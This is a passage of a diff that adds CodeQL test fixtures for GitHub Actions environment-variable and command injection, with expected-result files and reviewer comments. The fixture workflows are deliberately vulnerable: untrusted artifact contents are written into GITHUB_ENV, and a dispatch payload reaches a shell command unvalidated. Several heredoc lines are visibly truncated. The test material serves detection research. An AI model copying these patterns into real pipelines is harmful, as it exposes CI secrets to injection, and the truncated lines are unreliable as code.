from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ 
env.RUNTIME_VERSIONS }} + diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml new file mode 100644 index 00000000000..3a0c4cc91b8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml 
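Review bot: The only difference between this fixture and `test12.yml` is the job-level `if: ${{ github.repository_owner == 'cloudflare' }}`, and `EnvVarInjectionCritical.expected` in this commit selects `test12.yml` but not `test11.yml`, so that condition is being accepted as a control check. On a `workflow_run` trigger the workflow runs in the base repository, so `github.repository_owner` is the base owner even when the triggering run came from a fork pull request. The condition therefore does not appear to limit who produced the downloaded artifact. It is worth confirming that a repository-owner check should count against artifact-sourced findings for `workflow_run`. A comment at the top of the fixture should state the intended result, for example `# expected: no Critical alert, job is guarded by a repository_owner check`.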
@@ -0,0 +1,80 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts from another workflow + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: runtime-versions.md + + - name: "Put runtime versions on the environment" + id: runtime_versions + run: | + { + echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV" + + - name: "Download pre-release report" + uses: dawidd6/action-download-artifact@v2 + with: + run_id: ${{ github.event.workflow_run.id }} + name: prerelease-report.md + + - name: "Put pre-release report on the environment" + id: prerelease_report + run: | + { + echo 'PRERELEASE_REPORT<> "$GITHUB_ENV" + + - name: "Comment on PR with Wrangler link" + uses: marocchino/sticky-pull-request-comment@v2 + with: + number: ${{ env.WORKFLOW_RUN_PR_FOR_WRANGLER }} + message: | + ${{ env.PRERELEASE_REPORT }} + + --- + + ${{ env.RUNTIME_VERSIONS }} + 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 359275aef43..cbd17161942 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -20,6 +20,14 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | 
provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -61,6 +69,14 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho 
"pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -84,3 +100,6 @@ subpaths | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index eaa9fed4c61..e780af4107d 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -20,6 +20,14 @@ edges | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:56:9:62:6 | Uses Step | provenance | | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | 
provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -61,5 +69,13 @@ nodes | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | semmle.label | cat foo/.github/java-config.env >> $GITHUB_ENV | +| .github/workflows/test11.yml:39:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:49:14:54:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test11.yml:56:9:62:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test11.yml:64:14:69:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | subpaths #select 
diff --git a/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml b/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml new file mode 100644 index 00000000000..d87c3cad006 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml 
@@ -0,0 +1,196 @@ +name: "Run Dagger pipeline" +description: "Runs a given dagger pipeline" +inputs: + subcommand: + description: "Subcommand for airbyte-ci" + required: true + context: + description: "CI context (e.g., pull_request, manual)" + required: true + github_token: + description: "GitHub token" + required: false + dagger_cloud_token: + description: "Dagger Cloud token" + required: false + docker_hub_username: + description: "Dockerhub username" + required: false + docker_hub_password: + description: "Dockerhub password" + required: false + options: + description: "Options for the subcommand" + required: false + production: + description: "Whether to run in production mode" + required: false + default: "True" + report_bucket_name: + description: "Bucket name for CI reports" + required: false + default: "airbyte-ci-reports-multi" + gcp_gsm_credentials: + description: "GCP credentials for GCP Secret Manager" + required: false + default: "" + gcp_integration_tester_credentials: + description: "GCP credentials for integration tests" + required: false + default: "" + git_repo_url: + description: "Git repository URL" + default: https://github.com/airbytehq/airbyte.git + required: false + git_branch: + description: "Git branch to checkout" + required: false + git_revision: + description: "Git revision to checkout" + required: false + slack_webhook_url: + description: "Slack webhook URL" + required: false + metadata_service_gcs_credentials: + description: "GCP credentials for metadata service" + required: false + metadata_service_bucket_name: + description: "Bucket name for metadata service" + required: false + default: "prod-airbyte-cloud-connector-metadata-service" + sentry_dsn: + description: "Sentry DSN" + required: false + spec_cache_bucket_name: + description: "Bucket name for GCS spec cache" + required: false + default: "io-airbyte-cloud-spec-cache" + spec_cache_gcs_credentials: + description: "GCP credentials for GCS spec cache" + required: false + 
gcs_credentials: + description: "GCP credentials for GCS" + required: false + ci_job_key: + description: "CI job key" + required: false + s3_build_cache_access_key_id: + description: "Gradle S3 Build Cache AWS access key ID" + required: false + s3_build_cache_secret_key: + description: "Gradle S3 Build Cache AWS secret key" + required: false + airbyte_ci_binary_url: + description: "URL to airbyte-ci binary" + required: false + default: https://connectors.airbyte.com/airbyte-ci/releases/ubuntu/latest/airbyte-ci + python_registry_token: + description: "Python registry API token to publish python package" + required: false + is_fork: + description: "Whether the PR is from a fork" + required: false + default: "false" + max_attempts: + description: "Number of attempts at running the airbyte-ci command" + required: false + default: 1 + retry_wait_seconds: + description: "Number of seconds to wait between retry attempts" + required: false + default: 60 + +runs: + using: "composite" + steps: + - name: Get start timestamp + id: get-start-timestamp + shell: bash + run: echo "start-timestamp=$(date +%s)" >> $GITHUB_OUTPUT + - name: Docker login + id: docker-login + uses: docker/login-action@v3 + if: ${{ inputs.docker_hub_username != '' && inputs.docker_hub_password != '' }} + with: + username: ${{ inputs.docker_hub_username }} + password: ${{ inputs.docker_hub_password }} + - name: Install Airbyte CI + id: install-airbyte-ci + uses: ./.github/actions/install-airbyte-ci + with: + airbyte_ci_binary_url: ${{ inputs.airbyte_ci_binary_url }} + is_fork: ${{ inputs.is_fork }} + - name: Run airbyte-ci + id: run-airbyte-ci + uses: nick-fields/retry@v3 + env: + CI: "True" + CI_GIT_USER: ${{ github.repository_owner }} + CI_PIPELINE_START_TIMESTAMP: ${{ steps.get-start-timestamp.outputs.start-timestamp }} + PULL_REQUEST_NUMBER: ${{ github.event.pull_request.number }} + # Next environment variables are workflow inputs based and can be set with empty values if the inputs are not required 
and passed + CI_CONTEXT: "${{ inputs.context }}" + CI_GIT_BRANCH: ${{ inputs.git_branch || github.head_ref }} + CI_GIT_REPO_URL: ${{ inputs.git_repo_url }} + CI_GIT_REVISION: ${{ inputs.git_revision || github.sha }} + CI_GITHUB_ACCESS_TOKEN: ${{ inputs.github_token }} + CI_JOB_KEY: ${{ inputs.ci_job_key }} + CI_REPORT_BUCKET_NAME: ${{ inputs.report_bucket_name }} + DAGGER_CLOUD_TOKEN: "${{ inputs.dagger_cloud_token }}" + DOCKER_HUB_PASSWORD: ${{ inputs.docker_hub_password }} + DOCKER_HUB_USERNAME: ${{ inputs.docker_hub_username }} + GCP_GSM_CREDENTIALS: ${{ inputs.gcp_gsm_credentials }} + GCP_INTEGRATION_TESTER_CREDENTIALS: ${{ inputs.gcp_integration_tester_credentials }} + GCS_CREDENTIALS: ${{ inputs.gcs_credentials }} + METADATA_SERVICE_BUCKET_NAME: ${{ inputs.metadata_service_bucket_name }} + METADATA_SERVICE_GCS_CREDENTIALS: ${{ inputs.metadata_service_gcs_credentials }} + PRODUCTION: ${{ inputs.production }} + PYTHON_REGISTRY_TOKEN: ${{ inputs.python_registry_token }} + PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }} + S3_BUILD_CACHE_ACCESS_KEY_ID: ${{ inputs.s3_build_cache_access_key_id }} + S3_BUILD_CACHE_SECRET_KEY: ${{ inputs.s3_build_cache_secret_key }} + SENTRY_DSN: ${{ inputs.sentry_dsn }} + SLACK_WEBHOOK: ${{ inputs.slack_webhook_url }} + SPEC_CACHE_BUCKET_NAME: ${{ inputs.spec_cache_bucket_name }} + SPEC_CACHE_GCS_CREDENTIALS: ${{ inputs.spec_cache_gcs_credentials }} + with: + shell: bash + max_attempts: ${{ inputs.max_attempts }} + retry_wait_seconds: ${{ inputs.retry_wait_seconds }} + # 360mn > 6 hours: it's the GitHub runner max job duration + timeout_minutes: 360 + command: | + airbyte-ci --disable-update-check --disable-dagger-run --is-ci --gha-workflow-run-id=${{ github.run_id }} ${{ inputs.subcommand }} ${{ inputs.options }} + - name: Stop Engine + id: stop-engine + if: always() + shell: bash + run: | + mapfile -t containers < <(docker ps --filter name="dagger-engine-*" -q) + if [[ "${#containers[@]}" -gt 0 ]]; then + # give 5mn to the 
Dagger Engine to push cache data to Dagger Cloud + docker stop -t 300 "${containers[@]}"; + fi + + - name: Collect dagger engine logs + id: collect-dagger-engine-logs + if: always() + uses: jwalton/gh-docker-logs@v2 + with: + dest: "./dagger_engine_logs" + images: "registry.dagger.io/engine" + + - name: Tar logs + id: tar-logs + if: always() + shell: bash + run: tar cvzf ./dagger_engine_logs.tgz ./dagger_engine_logs + + - name: Upload logs to GitHub + id: upload-dagger-engine-logs + if: always() + uses: actions/upload-artifact@v4 + with: + name: ${{ github.job }}_dagger_engine_logs.tgz + path: ./dagger_engine_logs.tgz + retention-days: 7 diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml new file mode 100644 index 00000000000..6a449e24cf0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml 
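Review bot: The `command:` line of the `Run airbyte-ci` step interpolates both `${{ inputs.subcommand }}` and `${{ inputs.options }}`, but the .expected files in this commit only pin the `inputs.subcommand` flow, since no caller in the test passes `options`. The second interpolation on the sink line is therefore not covered. Either add a caller that feeds `options` from the event payload, or note the gap in a comment such as `# sink under test: inputs.subcommand (inputs.options is not exercised)`, placed at the end of the file so the line numbers recorded in the .expected files stay valid. Separately, `PYTHON_REGISTRY_URL: ${{ inputs.python_registry_url }}` reads an input that the `inputs:` block does not declare (only `python_registry_token` is declared).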
@@ -0,0 +1,63 @@ +name: Finalize connector rollout + +on: + repository_dispatch: + types: [finalize-connector-rollout] + workflow_dispatch: + inputs: + connector_name: + description: "Connector name" + required: true + action: + description: "Action to perform" + required: true + options: ["promote", "rollback"] +jobs: + finalize_rollout: + name: Finalize connector rollout + runs-on: connector-publish-large + env: + ACTION: ${{ github.event_name == 'workflow_dispatch' && github.event.inputs.action || github.event.client_payload.action }} + steps: + - name: Check action value + run: | + if [[ "${ACTION}" != "promote" && "${ACTION}" != "rollback" ]]; then + echo "Invalid action: ${ACTION}" + exit 1 + fi + shell: bash + - name: Checkout Airbyte + uses: actions/checkout@v4 + - name: Promote {{ github.event.client_payload.connector_name }} release candidate + id: promote-release-candidate + if: ${{ env.ACTION == 'promote' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --promote-release-candidate" + - name: Rollback {{ github.event.client_payload.connector_name }} release candidate + id: rollback-release-candidate + if: ${{ env.ACTION == 'rollback' }} + uses: ./.github/actions/run-airbyte-ci + with: + context: "manual" + dagger_cloud_token: ${{ secrets.DAGGER_CLOUD_TOKEN_2 }} + docker_hub_password: ${{ 
secrets.DOCKER_HUB_PASSWORD }} + docker_hub_username: ${{ secrets.DOCKER_HUB_USERNAME }} + gcp_gsm_credentials: ${{ secrets.GCP_GSM_CREDENTIALS }} + gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + github_token: ${{ secrets.GITHUB_TOKEN }} + metadata_service_gcs_credentials: ${{ secrets.METADATA_SERVICE_PROD_GCS_CREDENTIALS }} + sentry_dsn: ${{ secrets.SENTRY_AIRBYTE_CI_DSN }} + slack_webhook_url: ${{ secrets.PUBLISH_ON_MERGE_SLACK_WEBHOOK }} + spec_cache_gcs_credentials: ${{ secrets.SPEC_CACHE_SERVICE_ACCOUNT_KEY_PUBLISH }} + subcommand: "connectors --name=${{ github.event.client_payload.connector_name }} publish --rollback-release-candidate" diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index decabad082f..b66822accab 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected 
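Review bot: Nothing in this fixture says which expressions are the intended sources. A reader has to work back from the .expected files to learn that the two `subcommand:` values built from `github.event.client_payload.connector_name` are the flows under test. The `Check action value` step validates only `ACTION`, while `connector_name` reaches `./.github/actions/run-airbyte-ci` unvalidated, which appears to be the point of the test. I would record that with a trailing comment on each `subcommand:` line, e.g. `# source: client_payload.connector_name, not validated`, which keeps the recorded line and column positions unchanged.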
